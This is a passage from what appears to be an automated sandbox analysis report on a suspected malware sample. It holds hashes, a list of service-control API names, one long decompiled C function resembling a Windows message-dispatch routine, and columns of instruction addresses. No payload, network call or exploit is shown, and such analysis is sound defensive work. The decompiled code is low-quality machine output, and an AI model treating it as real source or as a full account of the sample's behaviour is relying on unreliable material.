                  • CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,023ED563), ref: 023ED330
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: HeapService$Config2EnumErrorLastProcessQueryServicesStatus$AllocateCloseCountFreeHandleOpenTick
                  • String ID:
                  • API String ID: 2166652104-0
                  • Opcode ID: 26eddb9ac37fe090369e0dec95b59696b4848ec12802b3b8fe419008701ecd7c
                  • Instruction ID: 0653cdb0a0807ab6633c50f27f1a4b31b97b053d10bfe879c4e3c21bf6b1ef0f
                  • Opcode Fuzzy Hash: 26eddb9ac37fe090369e0dec95b59696b4848ec12802b3b8fe419008701ecd7c
                  • Instruction Fuzzy Hash: D54153B5E10219AFDF159BA9DC45FAEB7BDEB44700F100129E616E6280D770EE448B60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004110C4, Relevance: 2.0, APIs: 1, Instructions: 452COMMONCrypto
                  Download Yara Rule
                  C-Code - Quality: 37%
                  			E004110C4(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t156;
				signed int _t158;
				signed int* _t161;
				intOrPtr _t168;
				intOrPtr* _t169;
				signed int _t172;
				signed int _t175;
				signed int* _t179;
				signed int* _t182;
				signed int _t186;
				signed int _t190;
				signed int _t194;
				signed int _t198;
				signed int _t201;
				signed int* _t203;
				signed int _t204;
				signed int _t205;
				intOrPtr* _t206;
				signed int _t207;
				signed int _t222;
				signed int _t226;
				unsigned int _t233;
				void* _t234;

				_t209 = __ecx;
				_push(0x70);
				E00431A9B(E0044B122, __ebx, __edi, __esi);
				_t231 = __ecx;
				 *((intOrPtr*)(_t234 - 0x10)) = 0;
				 *((intOrPtr*)(_t234 - 0x14)) = 0x7fffffff;
				_t198 =  *(_t234 + 8);
				 *(_t234 - 4) = 0;
				if(_t198 != 0x111) {
					__eflags = _t198 - 0x4e;
					if(_t198 != 0x4e) {
						_t233 =  *(_t234 + 0x10);
						__eflags = _t198 - 6;
						if(_t198 == 6) {
							E00410A7D(_t209, _t231,  *((intOrPtr*)(_t234 + 0xc)), E0040EE3C(_t198, __ecx, _t233));
						}
						__eflags = _t198 - 0x20;
						if(_t198 != 0x20) {
							L12:
							_t156 =  *(_t231 + 0x4c);
							__eflags = _t156;
							if(_t156 == 0) {
								L20:
								_t158 =  *((intOrPtr*)( *_t231 + 0x28))();
								 *(_t234 + 0x10) = _t158;
								_t201 = (_t158 ^  *(_t234 + 8)) & 0x000001ff;
								E0040D713(_t201, _t234 - 0x14, _t231, _t233, 7);
								_t203 = 0x464b18 + _t201 * 0xc;
								 *(_t234 - 0x18) = _t203;
								__eflags =  *(_t234 + 8) -  *_t203;
								if( *(_t234 + 8) !=  *_t203) {
									L25:
									_t161 =  *(_t234 - 0x18);
									_t204 =  *(_t234 + 0x10);
									 *_t161 =  *(_t234 + 8);
									_t161[2] = _t204;
									while(1) {
										__eflags =  *_t204;
										if( *_t204 == 0) {
											break;
										}
										__eflags =  *(_t234 + 8) - 0xc000;
										_push(0);
										_push(0);
										if( *(_t234 + 8) >= 0xc000) {
											_push(0xc000);
											_push( *((intOrPtr*)( *(_t234 + 0x10) + 4)));
											while(1) {
												_t205 = E0040CDA9();
												__eflags = _t205;
												if(_t205 == 0) {
													break;
												}
												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t205 + 0x10)))) -  *(_t234 + 8);
												if( *((intOrPtr*)( *((intOrPtr*)(_t205 + 0x10)))) ==  *(_t234 + 8)) {
													( *(_t234 - 0x18))[1] = _t205;
													E0040D747(_t234 - 0x14);
													L113:
													_t206 =  *((intOrPtr*)(_t205 + 0x14));
													L114:
													_push(_t233);
													L115:
													_push( *((intOrPtr*)(_t234 + 0xc)));
													L116:
													_t168 =  *_t206(); // executed
													L117:
													 *((intOrPtr*)(_t234 - 0x10)) = _t168;
													goto L118;
												}
												_push(0);
												_push(0);
												_push(0xc000);
												_t207 = _t205 + 0x18;
												__eflags = _t207;
												_push(_t207);
											}
											_t204 =  *(_t234 + 0x10);
											L36:
											_t204 =  *_t204();
											 *(_t234 + 0x10) = _t204;
											continue;
										}
										_push( *(_t234 + 8));
										_push( *((intOrPtr*)(_t204 + 4)));
										_t175 = E0040CDA9();
										 *(_t234 + 0x10) = _t175;
										__eflags = _t175;
										if(_t175 == 0) {
											goto L36;
										}
										( *(_t234 - 0x18))[1] = _t175;
										E0040D747(_t234 - 0x14);
										L29:
										_t222 =  *((intOrPtr*)( *(_t234 + 0x10) + 0x10)) - 1;
										__eflags = _t222 - 0x53;
										if(__eflags > 0) {
											goto L118;
										}
										switch( *((intOrPtr*)(_t222 * 4 +  &M00411688))) {
											case 0:
												_push(E00422D89(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc)));
												goto L44;
											case 1:
												_push( *(__ebp + 0xc));
												goto L44;
											case 2:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												__eax = E0040EE3C(__ebx, __ecx,  *(__ebp + 0xc));
												goto L50;
											case 3:
												_push(__esi);
												__eax = E0040EE3C(__ebx, __ecx,  *(__ebp + 0xc));
												goto L42;
											case 4:
												_push(__esi);
												L44:
												__ecx = __edi; // executed
												__eax =  *__ebx(); // executed
												goto L117;
											case 5:
												__ecx = __ebp - 0x28;
												E00422859(__ebp - 0x28) =  *(__esi + 4);
												__ecx = __ebp - 0x7c;
												 *((char*)(__ebp - 4)) = 1;
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = E0040D77C(__ecx, __eflags);
												__eax =  *__esi;
												__esi =  *(__esi + 8);
												 *((char*)(__ebp - 4)) = 2;
												 *(__ebp - 0x5c) = __eax;
												__eax = E0040EE68(__ecx, __edi, __esi, __eflags, __eax);
												__eflags = __eax;
												if(__eax == 0) {
													__eax =  *(__edi + 0x4c);
													__eflags = __eax;
													if(__eax != 0) {
														__ecx = __eax + 0x24;
														__eax = E00424500(__eax + 0x24, __edi, __esi,  *(__ebp - 0x5c));
														__eflags = __eax;
														if(__eax != 0) {
															 *(__ebp - 0x2c) = __eax;
														}
													}
													__eax = __ebp - 0x7c;
												}
												_push(__esi);
												_push(__eax);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
												_t84 = __ebp - 0x5c;
												 *_t84 =  *(__ebp - 0x5c) & 0x00000000;
												__eflags =  *_t84;
												__ecx = __ebp - 0x7c;
												 *(__ebp - 0x10) = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 1;
												__eax = E0040F76D(__ebx, __ebp - 0x7c, __edi, __esi,  *_t84);
												goto L59;
											case 6:
												__ecx = __ebp - 0x28;
												E00422859(__ebp - 0x28) =  *(__esi + 4);
												_push( *(__esi + 8));
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												 *((char*)(__ebp - 4)) = 3;
												__eax =  *__ebx();
												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
												 *(__ebp - 0x10) = __ebp - 0x28;
												L59:
												__ecx = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 0;
												__eax = E00422E06(__ecx);
												goto L118;
											case 7:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = E0040EE3C(__ebx, __ecx, __esi);
												goto L62;
											case 8:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L42;
											case 9:
												goto L114;
											case 0xa:
												_push(E0041F4E8(__ebx, __ecx, __edi, __esi, __eflags, __esi));
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L62:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L50:
												_push(__eax);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L117;
											case 0xb:
												_push(__esi);
												goto L110;
											case 0xc:
												_push( *(__ebp + 0xc));
												goto L66;
											case 0xd:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L118;
											case 0xe:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L69;
											case 0xf:
												_push(__esi >> 0x10);
												__eax = __si;
												goto L69;
											case 0x10:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												goto L72;
											case 0x11:
												__eax = E0040EE3C(__ebx, __ecx, __esi);
												goto L48;
											case 0x12:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L117;
											case 0x13:
												_push(E0040EE3C(__ebx, __ecx,  *(__ebp + 0xc)));
												_push(E0040EE3C(__ebx, __ecx, __esi));
												__eax = 0;
												__eflags =  *((intOrPtr*)(__edi + 0x20)) - __esi;
												_t112 =  *((intOrPtr*)(__edi + 0x20)) == __esi;
												__eflags = _t112;
												__eax = 0 | _t112;
												goto L75;
											case 0x14:
												__eax = E00422D89(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
												goto L77;
											case 0x15:
												__eax = E0041F4E8(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
												goto L77;
											case 0x16:
												__esi = __esi >> 0x10;
												_push(__esi >> 0x10);
												__eax = __si;
												_push(__si);
												__eax = E0041F4E8(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
												goto L75;
											case 0x17:
												_push( *(__ebp + 0xc));
												goto L81;
											case 0x18:
												_push(__esi);
												L81:
												__eax = E0040EE3C(__ebx, __ecx);
												L77:
												_push(__eax);
												goto L66;
											case 0x19:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												goto L84;
											case 0x1a:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__ecx);
												L84:
												_push(__eax);
												__eax = E0040EE3C(__ebx, __ecx,  *(__ebp + 0xc));
												goto L75;
											case 0x1b:
												_push(__esi);
												__eax = E0040EE3C(__ebx, __ecx,  *(__ebp + 0xc));
												goto L69;
											case 0x1c:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = E0040EE3C(__ebx, __ecx, __esi);
												goto L88;
											case 0x1d:
												__ecx =  *(__ebp + 0xc);
												__edx = __cx;
												__ecx =  *(__ebp + 0xc) >> 0x10;
												__ecx = __cx;
												 *((intOrPtr*)(__ebp + 8)) = __edx;
												 *(__ebp + 0xc) = __ecx;
												__eflags = __eax - 0x2a;
												if(__eax != 0x2a) {
													_push(__ecx);
													_push(__edx);
													goto L111;
												}
												_push(E0040EE3C(__ebx, __ecx, __esi));
												_push( *(__ebp + 0xc));
												_push( *((intOrPtr*)(__ebp + 8)));
												goto L73;
											case 0x1e:
												_push(__esi);
												L66:
												__ecx = __edi; // executed
												__eax =  *__ebx(); // executed
												goto L118;
											case 0x1f:
												_push(__esi);
												_push( *(__ebp + 0xc));
												__ecx = __edi;
												__eax =  *__ebx();
												goto L2;
											case 0x20:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__ecx);
												L42:
												_push(__eax);
												goto L116;
											case 0x21:
												__eax =  *(__ebp + 0xc);
												_push(__esi);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L88:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L75:
												_push(__eax);
												goto L73;
											case 0x22:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												L72:
												_push(__eax);
												_push( *(__ebp + 0xc));
												L73:
												__ecx = __edi; // executed
												__eax =  *__ebx(); // executed
												goto L118;
											case 0x23:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
												L6:
												__eflags = _t194;
												if(_t194 != 0) {
													goto L118;
												}
												goto L39;
											case 0x24:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L118;
											case 0x25:
												goto L118;
											case 0x26:
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x10) = __eax;
												__eflags = __eax;
												if(__eax == 0) {
													goto L118;
												}
												L39:
												 *(_t234 - 4) =  *(_t234 - 4) | 0xffffffff;
												E0040D747(_t234 - 0x14);
												_t172 = 0;
												__eflags = 0;
												goto L40;
											case 0x27:
												__eax = E0041F4E8(__ebx, __ecx, __edi, __esi, __eflags, __esi);
												L48:
												_push(__eax);
												L110:
												_push( *(__ebp + 0xc));
												goto L111;
											case 0x28:
												_push(E0041F4E8(__ebx, __ecx, __edi, __esi, __eflags, __esi));
												goto L115;
											case 0x29:
												_push(__esi);
												__eax = E0041F4E8(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
												goto L69;
											case 0x2a:
												__ecx = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												__eax = __esi;
												__eax = __esi >> 0x10;
												__ecx = __eax;
												__ecx = __eax & 0x0000f000;
												_push(__ecx);
												__eax = __eax & 0x00000fff;
												__eflags = __eax;
												_push(__eax);
												__eax = E0040EE3C(__ebx, __ecx,  *(__ebp + 0xc));
												goto L104;
											case 0x2b:
												__eax =  *(__ebp + 0xc) & 0x000000ff;
												_push(__esi);
												L69:
												_push(__eax);
												L111:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L118;
											case 0x2c:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L104:
												_push(__eax);
												goto L105;
											case 0x2d:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												_push( *(__ebp + 0xc));
												L105:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L2;
										}
									}
									_t179 =  *(_t234 - 0x18);
									_t58 =  &(_t179[1]);
									 *_t58 = _t179[1] & 0x00000000;
									__eflags =  *_t58;
									E0040D747(_t234 - 0x14);
									goto L39;
								}
								_t182 = _t203;
								__eflags =  *(_t234 + 0x10) - _t182[2];
								if( *(_t234 + 0x10) != _t182[2]) {
									goto L25;
								}
								_t205 = _t182[1];
								 *(_t234 + 0x10) = _t205;
								E0040D747(_t234 - 0x14);
								__eflags = _t205;
								if(_t205 == 0) {
									goto L39;
								}
								__eflags =  *(_t234 + 8) - 0xc000;
								if( *(_t234 + 8) < 0xc000) {
									goto L29;
								}
								goto L113;
							}
							__eflags =  *(_t156 + 0x74);
							if( *(_t156 + 0x74) <= 0) {
								goto L20;
							}
							__eflags = _t198 - 0x200;
							if(_t198 < 0x200) {
								L16:
								__eflags = _t198 - 0x100;
								if(_t198 < 0x100) {
									L18:
									__eflags = _t198 - 0x281 - 0x10;
									if(_t198 - 0x281 > 0x10) {
										goto L20;
									}
									L19:
									_t186 =  *((intOrPtr*)( *( *(_t231 + 0x4c)) + 0x94))(_t198,  *((intOrPtr*)(_t234 + 0xc)), _t233, _t234 - 0x10);
									__eflags = _t186;
									if(_t186 != 0) {
										goto L118;
									}
									goto L20;
								}
								__eflags = _t198 - 0x10f;
								if(_t198 <= 0x10f) {
									goto L19;
								}
								goto L18;
							}
							__eflags = _t198 - 0x209;
							if(_t198 <= 0x209) {
								goto L19;
							}
							goto L16;
						} else {
							_t190 = E00410AF5(_t198, _t231, _t231, _t233, _t233 >> 0x10);
							__eflags = _t190;
							if(_t190 != 0) {
								L2:
								 *((intOrPtr*)(_t234 - 0x10)) = 1;
								L118:
								_t169 =  *((intOrPtr*)(_t234 + 0x14));
								if(_t169 != 0) {
									 *_t169 =  *((intOrPtr*)(_t234 - 0x10));
								}
								 *(_t234 - 4) =  *(_t234 - 4) | 0xffffffff;
								E0040D747(_t234 - 0x14);
								_t172 = 1;
								L40:
								return E00431B73(_t172);
							}
							goto L12;
						}
					}
					_t226 =  *(_t234 + 0x10);
					__eflags =  *_t226;
					if( *_t226 == 0) {
						goto L39;
					}
					_push(_t234 - 0x10);
					_push(_t226);
					_push( *((intOrPtr*)(_t234 + 0xc)));
					_t194 =  *((intOrPtr*)( *__ecx + 0xf4))();
					goto L6;
				}
				_push( *(_t234 + 0x10));
				_push( *((intOrPtr*)(_t234 + 0xc)));
				if( *((intOrPtr*)( *__ecx + 0xf0))() == 0) {
					goto L39;
				}
				goto L2;
			}


























                  0x004110c4
                  0x004110c4
                  0x004110cb
                  0x004110d0
                  0x004110d4
                  0x004110d7
                  0x004110de
                  0x004110e1
                  0x004110ea
                  0x0041110e
                  0x00411111
                  0x0041113d
                  0x00411140
                  0x00411143
                  0x00411150
                  0x00411150
                  0x00411155
                  0x00411158
                  0x0041116e
                  0x0041116e
                  0x00411171
                  0x00411173
                  0x004111c2
                  0x004111c6
                  0x004111d3
                  0x004111d6
                  0x004111dc
                  0x004111e7
                  0x004111ed
                  0x004111f0
                  0x004111f2
                  0x00411222
                  0x00411222
                  0x00411225
                  0x0041122b
                  0x0041122d
                  0x004112bc
                  0x004112bc
                  0x004112bf
                  0x00000000
                  0x00000000
                  0x00411235
                  0x0041123c
                  0x0041123e
                  0x00411240
                  0x00411284
                  0x00411289
                  0x004112a7
                  0x004112ac
                  0x004112ae
                  0x004112b0
                  0x00000000
                  0x00000000
                  0x00411292
                  0x00411294
                  0x00411650
                  0x00411653
                  0x00411658
                  0x00411658
                  0x0041165b
                  0x0041165b
                  0x0041165c
                  0x0041165c
                  0x0041165f
                  0x00411661
                  0x00411663
                  0x00411663
                  0x00000000
                  0x00411663
                  0x0041129a
                  0x0041129c
                  0x0041129e
                  0x004112a3
                  0x004112a3
                  0x004112a6
                  0x004112a6
                  0x004112b2
                  0x004112b5
                  0x004112b7
                  0x004112b9
                  0x00000000
                  0x004112b9
                  0x00411242
                  0x00411245
                  0x00411248
                  0x0041124d
                  0x00411250
                  0x00411252
                  0x00000000
                  0x00000000
                  0x00411257
                  0x0041125d
                  0x00411262
                  0x0041126b
                  0x0041126e
                  0x00411271
                  0x00000000
                  0x00000000
                  0x00411277
                  0x00000000
                  0x00411302
                  0x00000000
                  0x00000000
                  0x0041130c
                  0x00000000
                  0x00000000
                  0x00411326
                  0x00411328
                  0x00411328
                  0x0041132b
                  0x0041132c
                  0x0041132f
                  0x00411333
                  0x00000000
                  0x00000000
                  0x00411342
                  0x00411346
                  0x00000000
                  0x00000000
                  0x0041134d
                  0x00411303
                  0x00411303
                  0x00411305
                  0x00000000
                  0x00000000
                  0x00411350
                  0x00411358
                  0x0041135b
                  0x0041135e
                  0x00411362
                  0x00411365
                  0x0041136a
                  0x0041136c
                  0x00411370
                  0x00411374
                  0x00411377
                  0x0041137c
                  0x0041137e
                  0x00411380
                  0x00411383
                  0x00411385
                  0x0041138a
                  0x0041138d
                  0x00411392
                  0x00411394
                  0x00411396
                  0x00411396
                  0x00411394
                  0x00411399
                  0x00411399
                  0x0041139c
                  0x0041139d
                  0x0041139e
                  0x004113a1
                  0x004113a2
                  0x004113a4
                  0x004113a6
                  0x004113aa
                  0x004113aa
                  0x004113aa
                  0x004113ae
                  0x004113b1
                  0x004113b4
                  0x004113b8
                  0x00000000
                  0x00000000
                  0x004113ce
                  0x004113d6
                  0x004113d9
                  0x004113dc
                  0x004113df
                  0x004113e2
                  0x004113e3
                  0x004113e5
                  0x004113e9
                  0x004113eb
                  0x004113ef
                  0x004113bd
                  0x004113bd
                  0x004113c0
                  0x004113c4
                  0x00000000
                  0x00000000
                  0x004113f4
                  0x004113f7
                  0x004113f7
                  0x004113fa
                  0x004113fc
                  0x00000000
                  0x00000000
                  0x0041140e
                  0x00411411
                  0x00411412
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00411421
                  0x00411422
                  0x00411425
                  0x00411401
                  0x00411401
                  0x00411402
                  0x00411338
                  0x00411338
                  0x00411339
                  0x0041133b
                  0x00000000
                  0x00000000
                  0x00411640
                  0x00000000
                  0x00000000
                  0x0041142a
                  0x00000000
                  0x00000000
                  0x00411436
                  0x00411438
                  0x00000000
                  0x00000000
                  0x0041143f
                  0x00411442
                  0x00411442
                  0x00411445
                  0x00411446
                  0x00000000
                  0x00000000
                  0x00411456
                  0x00411457
                  0x00000000
                  0x00000000
                  0x0041145c
                  0x0041145e
                  0x0041145e
                  0x00411461
                  0x00411462
                  0x00000000
                  0x00000000
                  0x0041131b
                  0x00000000
                  0x00000000
                  0x00411311
                  0x00411313
                  0x00000000
                  0x00000000
                  0x0041147a
                  0x00411481
                  0x00411482
                  0x00411484
                  0x00411487
                  0x00411487
                  0x00411487
                  0x00000000
                  0x00000000
                  0x00411490
                  0x00000000
                  0x00000000
                  0x0041149b
                  0x00000000
                  0x00000000
                  0x004114a4
                  0x004114a8
                  0x004114a9
                  0x004114ac
                  0x004114b0
                  0x00000000
                  0x00000000
                  0x004114b7
                  0x00000000
                  0x00000000
                  0x004114c1
                  0x004114ba
                  0x004114ba
                  0x00411495
                  0x00411495
                  0x00000000
                  0x00000000
                  0x004114c4
                  0x004114c6
                  0x004114c6
                  0x004114c9
                  0x004114ca
                  0x00000000
                  0x00000000
                  0x004114d8
                  0x004114db
                  0x004114de
                  0x004114e1
                  0x004114cd
                  0x004114cd
                  0x004114d1
                  0x00000000
                  0x00000000
                  0x004114e4
                  0x004114e8
                  0x00000000
                  0x00000000
                  0x004114f2
                  0x004114f5
                  0x004114f5
                  0x004114f8
                  0x004114fa
                  0x00000000
                  0x00000000
                  0x00411506
                  0x00411509
                  0x0041150c
                  0x0041150f
                  0x00411512
                  0x00411515
                  0x00411518
                  0x0041151b
                  0x0041152f
                  0x00411530
                  0x00000000
                  0x00411530
                  0x00411523
                  0x00411524
                  0x00411527
                  0x00000000
                  0x00000000
                  0x00411536
                  0x0041142d
                  0x0041142d
                  0x0041142f
                  0x00000000
                  0x00000000
                  0x0041153c
                  0x0041153d
                  0x00411540
                  0x00411542
                  0x00000000
                  0x00000000
                  0x004112ea
                  0x004112ed
                  0x004112f0
                  0x004112f3
                  0x004112f4
                  0x004112f4
                  0x00000000
                  0x00000000
                  0x00411549
                  0x0041154c
                  0x0041154d
                  0x004114ff
                  0x004114ff
                  0x00411500
                  0x0041148a
                  0x0041148a
                  0x00000000
                  0x00000000
                  0x00411552
                  0x00411555
                  0x00411558
                  0x0041155b
                  0x00411465
                  0x00411465
                  0x00411466
                  0x00411469
                  0x00411469
                  0x0041146b
                  0x00000000
                  0x00000000
                  0x00411561
                  0x00411564
                  0x00411567
                  0x0041156a
                  0x0041156b
                  0x0041156f
                  0x00411572
                  0x00411573
                  0x00411577
                  0x00411578
                  0x0041157a
                  0x0041157c
                  0x00411130
                  0x00411130
                  0x00411132
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00411584
                  0x00411587
                  0x0041158a
                  0x0041158d
                  0x0041158e
                  0x00411592
                  0x00411595
                  0x00411596
                  0x0041159a
                  0x0041159b
                  0x0041159d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004115a4
                  0x004115a6
                  0x004115a8
                  0x004115ab
                  0x004115ad
                  0x00000000
                  0x00000000
                  0x004112d4
                  0x004112d4
                  0x004112db
                  0x004112e0
                  0x004112e0
                  0x00000000
                  0x00000000
                  0x004115b9
                  0x00411320
                  0x00411320
                  0x00411641
                  0x00411641
                  0x00000000
                  0x00000000
                  0x004115c9
                  0x00000000
                  0x00000000
                  0x004115cf
                  0x004115d3
                  0x00000000
                  0x00000000
                  0x004115dd
                  0x004115e0
                  0x004115e1
                  0x004115e3
                  0x004115e6
                  0x004115e8
                  0x004115ee
                  0x004115ef
                  0x004115ef
                  0x004115f4
                  0x004115f8
                  0x00000000
                  0x00000000
                  0x00411607
                  0x0041160b
                  0x0041144a
                  0x0041144a
                  0x00411644
                  0x00411644
                  0x00411646
                  0x00000000
                  0x00000000
                  0x00411611
                  0x00411614
                  0x00411617
                  0x0041161a
                  0x0041161b
                  0x0041161f
                  0x00411622
                  0x00411623
                  0x004115fd
                  0x004115fd
                  0x00000000
                  0x00000000
                  0x00411629
                  0x0041162c
                  0x0041162f
                  0x00411632
                  0x00411633
                  0x00411637
                  0x0041163a
                  0x0041163b
                  0x004115fe
                  0x004115fe
                  0x00411600
                  0x00000000
                  0x00000000
                  0x00411277
                  0x004112c5
                  0x004112c8
                  0x004112c8
                  0x004112c8
                  0x004112cf
                  0x00000000
                  0x004112cf
                  0x004111f7
                  0x004111f9
                  0x004111fc
                  0x00000000
                  0x00000000
                  0x004111fe
                  0x00411204
                  0x00411207
                  0x0041120c
                  0x0041120e
                  0x00000000
                  0x00000000
                  0x00411214
                  0x0041121b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041121d
                  0x00411175
                  0x00411179
                  0x00000000
                  0x00000000
                  0x0041117b
                  0x00411181
                  0x0041118b
                  0x0041118b
                  0x00411191
                  0x0041119b
                  0x004111a1
                  0x004111a4
                  0x00000000
                  0x00000000
                  0x004111a6
                  0x004111b4
                  0x004111ba
                  0x004111bc
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004111bc
                  0x00411193
                  0x00411199
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00411199
                  0x00411183
                  0x00411189
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041115a
                  0x00411165
                  0x0041116a
                  0x0041116c
                  0x00411102
                  0x00411102
                  0x00411666
                  0x00411666
                  0x0041166b
                  0x00411670
                  0x00411670
                  0x00411672
                  0x00411679
                  0x00411680
                  0x004112e2
                  0x004112e7
                  0x004112e7
                  0x00000000
                  0x0041116c
                  0x00411158
                  0x00411113
                  0x00411116
                  0x00411118
                  0x00000000
                  0x00000000
                  0x00411123
                  0x00411124
                  0x00411125
                  0x0041112a
                  0x00000000
                  0x0041112a
                  0x004110ec
                  0x004110f1
                  0x004110fc
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3
                  • String ID:
                  • API String ID: 431132790-0
                  • Opcode ID: 5581757f2f0f604347708a168a423f3eb4049c49235fdbbd8d9b4c50d54d3b50
                  • Instruction ID: 5d7ebeb502aa4d7c5eabf293e969739ff04ac9ecbf51b97e95c40226f3c0dc1a
                  • Opcode Fuzzy Hash: 5581757f2f0f604347708a168a423f3eb4049c49235fdbbd8d9b4c50d54d3b50
                  • Instruction Fuzzy Hash: 58F19270600219EFDB14DF55C880EFF7BA9EF08314F10851AFA19AB2A1D739D981DB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00427ACD, Relevance: 33.6, APIs: 3, Strings: 16, Instructions: 389windowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
